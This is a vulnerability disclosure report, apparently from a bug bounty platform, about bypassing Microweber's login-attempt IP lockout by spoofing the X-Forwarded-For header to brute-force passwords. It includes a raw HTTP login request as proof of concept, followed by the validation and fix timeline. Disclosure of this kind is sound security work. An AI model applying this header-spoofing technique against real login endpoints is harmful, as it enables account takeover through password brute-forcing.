Bypass IP detection to brute-force password in microweber/microweber


Reported on

Jul 8th 2022


In login API, by default, the IP address will be blocked when the user tries to login incorrectly more than 5 times but we can bypass this mechanism by abuse X-Forwarded-For header to bypass IP dectection and perform password brute-force.

Proof of Concept

POST /demo/api/user_login HTTP/1.1
Cookie: laravel_session=7HR3GLXKE5PUU6zXUPalGnXO1gTV1WslmgbrQkn1; XSRF-TOKEN=eyJpdiI6IkpKdWVoUmExR2NNWmllU3MzcjBIYmc9PSIsInZhbHVlIjoidjlWZitGNllSbEZHajJzYzVNa3dmdHRDdHdRWVdLOG03YUZQMzRIemgvaU9RbXJHWDV2REJrNVREZndCbjcrdVo5TXJ0SUtaYUlZK2E1bjQ5dTc5Q2lHbjd6ZHE0SkhGK0N5YzRja0liU21GdFJXY3FOTVZmZlVnR2x6WEdlMUkiLCJtYWMiOiJiNmY2ZjAxY2JkMTdlNzk4ZWY1MmExMGEzMDIzYThlM2Y2MzgwZDBjMzhkMGM5NmZiMTI5ODI4YjBjMWMzNTVhIiwidGFnIjoiIn0%3D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Xsrf-Token: eyJpdiI6IkpKdWVoUmExR2NNWmllU3MzcjBIYmc9PSIsInZhbHVlIjoidjlWZitGNllSbEZHajJzYzVNa3dmdHRDdHdRWVdLOG03YUZQMzRIemgvaU9RbXJHWDV2REJrNVREZndCbjcrdVo5TXJ0SUtaYUlZK2E1bjQ5dTc5Q2lHbjd6ZHE0SkhGK0N5YzRja0liU21GdFJXY3FOTVZmZlVnR2x6WEdlMUkiLCJtYWMiOiJiNmY2ZjAxY2JkMTdlNzk4ZWY1MmExMGEzMDIzYThlM2Y2MzgwZDBjMzhkMGM5NmZiMTI5ODI4YjBjMWMzNTVhIiwidGFnIjoiIn0=
X-Requested-With: XMLHttpRequest
Content-Length: 27
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: orange
X-Forwarded-For: // Change IP
Te: trailers
Connection: close


PoC Video

PoC Video

Note: If the image quality is low when viewing live, you can download and watch


This vulnerabiliy allow the attacker can perform bruteforce admin's password, perform deny of services attack, ...

We are processing your report and will contact the microweber team within 24 hours. a year ago
Nhien.IT modified the report
a year ago
Nhien.IT modified the report
a year ago
Nhien.IT modified the report
a year ago
We have contacted a member of the microweber team and are waiting to hear back a year ago
Peter Ivanov modified the Severity from High (8.3) to Medium (6.5) 10 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability 10 months ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov marked this as fixed in 1.2.20 with commit 53c000 10 months ago
Peter Ivanov has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation